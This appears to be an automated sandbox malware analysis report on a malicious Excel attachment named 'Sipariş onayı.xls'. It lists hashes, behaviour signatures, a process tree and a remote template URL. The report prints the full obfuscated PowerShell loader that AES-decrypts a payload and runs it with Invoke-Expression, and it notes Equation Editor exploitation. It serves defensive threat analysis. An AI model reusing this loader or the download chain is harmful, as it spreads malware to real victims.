Analysis
max time kernel: 144s
max time network: 108s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 09/07/2024, 10:29
Static task: static1
Behavioral task: behavioral1
  Sample: Sipariş onayı.xls
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: Sipariş onayı.xls
  Resource: win10v2004-20240704-en
General
Target: Sipariş onayı.xls
Size: 1.1MB
MD5: 94d52f7b132f459b88ba2b9c6ed076cb
SHA1: 6970a28538c35aa1c20b32a855e40c85842025d7
SHA256: 57b1e7f094836b89c613e86a12966702169ead968058ac24c738b891bb8fa01e
SHA512: c8a18dab02481a7d226d9d3a71b38087e3406e089051995c1be66e49dcb5b715212ab3eb8a36fe7925a32cb79d6baa98ba0ed2cdb8ea5803d5c1e5fe80b8b594
SSDEEP: 24576:48q+k+xbyN3g3yBO128OA2BFzfOSr4hBBzcIPuV8rv4zBkS3QHVO:dq+k+yOUJvSSr4N4IzvT+QH
Malware Config
Signatures
Blocklisted process makes network request (4 IoCs)
  flow 17, pid 288, EQNEDT32.EXE
  flow 20, pid 2176, WScript.exe
  flow 22, pid 2176, WScript.exe
  flow 24, pid 2232, powershell.exe
Abuses OpenXML format to download file from external location (2 IoCs)
  Key opened: \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Office\Common\Offline\Files\http://woi.gg/poqZbi (WINWORD.EXE)
  Key opened: \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Office\14.0\Common (EXCEL.EXE)
Drops file in System32 directory (1 IoCs)
  File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
Command and Scripting Interpreter: PowerShell
  pid 2232, powershell.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry (2 TTPs, 1 IoCs)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor (EXCEL.EXE)
Launches Equation Editor (1 TTPs, 1 IoCs)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
  pid 288, EQNEDT32.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid 1432, EXCEL.EXE
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid 2232, powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 2232, powershell.exe
  Token: SeShutdownPrivilege, pid 2780, WINWORD.EXE
Suspicious use of SetWindowsHookEx (5 IoCs)
  pid 1432, EXCEL.EXE (3 events)
  pid 2780, WINWORD.EXE (2 events)
Suspicious use of WriteProcessMemory (12 IoCs)
  PID 288 (EQNEDT32.EXE) wrote to memory of 2176, procid_target 33 (4 events)
  PID 2780 (WINWORD.EXE) wrote to memory of 2152, procid_target 34 (4 events)
  PID 2176 (WScript.exe) wrote to memory of 2232, procid_target 35 (4 events)
Processes
EXCEL.EXE (PID 1432)
  Image: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  Command: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Sipariş onayı.xls"
  - Abuses OpenXML format to download file from external location
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
WINWORD.EXE (PID 2780)
  Image: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
  - Abuses OpenXML format to download file from external location
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  splwow64.exe (PID 2152), child of WINWORD.EXE
    Image: C:\Windows\splwow64.exe
    Command: C:\Windows\splwow64.exe 12288
EQNEDT32.EXE (PID 288)
  Image: C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  WScript.exe (PID 2176), child of EQNEDT32.EXE
    Image: C:\Windows\SysWOW64\WScript.exe
    Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS"
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    powershell.exe (PID 2232), child of WScript.exe
      Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI30773578260699216772112657705967CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
      - Blocklisted process makes network request
      - Drops file in System32 directory
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads